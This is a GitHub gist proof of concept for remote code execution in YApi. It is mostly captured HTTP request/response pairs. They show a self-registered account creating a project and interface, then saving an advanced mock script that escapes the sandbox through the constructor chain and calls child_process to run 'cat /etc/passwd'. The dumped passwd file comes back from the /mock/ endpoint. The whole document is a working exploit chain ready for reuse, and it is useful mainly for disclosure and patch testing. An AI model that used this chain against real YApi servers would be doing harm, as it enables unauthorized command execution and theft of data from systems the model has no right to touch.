

@pikpikcu
Last active July 16, 2021 22:12
YApi-RCE

Proof of concept (PoC) for YApi remote code execution (RCE). The request/response pairs below show the full chain as captured: a self-registered account creates a project and an interface, stores an advanced mock script whose `this.constructor.constructor('return process')` chain escapes the mock sandbox to reach `child_process`, and the script then runs when the interface's `/mock/` endpoint is requested. Note that every step after registration succeeds with the `_yapi_token` cookie of an ordinary `member` account, so the weakness is reachable by anyone who can reach the registration endpoint.

Reference:

POC

Request:

POST /api/user/reg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 94
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"email":"test@qq.com","password":"test12345","username":"hacker"}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 202
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:40 GMT
Set-Cookie: _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjMxMCwiaWF0IjoxNjI2MzExMDgwLCJleHAiOjE2MjY5MTU4ODB9.L3CgGWZ7IvTxrIOW-hILPh69jUCOv9ATHRMEgpAZcAI; path=/; expires=Thu, 22 Jul 2021 01:04:40 GMT; httponly
Set-Cookie: _yapi_uid=310; path=/; expires=Thu, 22 Jul 2021 01:04:40 GMT; httponly

{"errcode":0,"errmsg":"成功!","data":{"uid":310,"email":"test@qq.com","username":"test12345","add_time":1626311080,"up_time":1626311080,"role":"member","type":"site","study":false}}

Request:

GET /api/group/list HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/json, text/plain, */*
Accept-Encoding: gzip

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 191
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:41 GMT

{"errcode":0,"errmsg":"成功!","data":[{"custom_field1":{"enable":false},"type":"private","_id":828,"group_name":"个人空间","add_time":1626311080,"up_time":1626311080,"role":"owner"}]}

Request:

POST /api/project/add HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 106
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"name":"pocccccc","basepath":"","group_id":"828","icon":"code-o","color":"cyan","project_type":"private"}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 423
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:41 GMT

{"errcode":0,"errmsg":"成功!","data":{"switch_notice":true,"is_mock_open":false,"strice":false,"is_json5":false,"name":"pocccccc","basepath":"","members":[],"project_type":"private","uid":310,"group_id":828,"icon":"code-o","color":"cyan","add_time":1626311081,"up_time":1626311081,"env":[{"header":[],"_id":"60ef89a944f602008ff90613","name":"local","domain":"http://127.0.0.1","global":[]}],"tag":[],"_id":761,"__v":0}}

Request:

GET /api/project/get?id=761 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 569
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:53 GMT

{"errcode":0,"errmsg":"成功!","data":{"switch_notice":true,"is_mock_open":false,"strice":false,"is_json5":false,"_id":761,"name":"pocccccc","basepath":"","project_type":"private","uid":310,"group_id":828,"icon":"code-o","color":"cyan","add_time":1626311081,"up_time":1626311081,"env":[{"header":[],"global":[],"_id":"60ef89a944f602008ff90613","name":"local","domain":"http://127.0.0.1"}],"tag":[],"cat":[{"index":0,"_id":263,"name":"公共分类","project_id":761,"desc":"公共分类","uid":310,"add_time":1626311081,"up_time":1626311081,"__v":0}],"role":"owner"}}

Request:

POST /api/interface/add HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 89
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"method":"GET","catid":"761","title":"wlsifafyio","path":"/wlsifafyio","project_id":761}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 487
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:55 GMT

{"errcode":0,"errmsg":"成功!","data":{"edit_uid":0,"status":"undone","type":"static","req_body_is_json_schema":false,"res_body_is_json_schema":false,"api_opened":false,"index":0,"tag":[],"method":"GET","catid":761,"title":"wlsifafyio","path":"/wlsifafyio","project_id":761,"req_params":[],"res_body_type":"json","query_path":{"path":"/wlsifafyio","params":[]},"uid":310,"add_time":1626311095,"up_time":1626311095,"req_query":[],"req_headers":[],"req_body_form":[],"_id":697,"__v":0}}

Request:

POST /api/plugin/advmock/save HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 382
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"project_id":"761","interface_id":"697","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 471
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:55 GMT

{"errcode":0,"errmsg":"成功!","data":{"enable":true,"interface_id":697,"mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","project_id":761,"uid":"310","up_time":1626311095,"_id":240,"__v":0}}

Request:

GET /mock/761/wlsifafyio HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: undefined
Connection: keep-alive
Content-Length: 1236
Content-Type: text/plain; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:56 GMT

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
node:x:1000:1000::/home/node:/bin/bash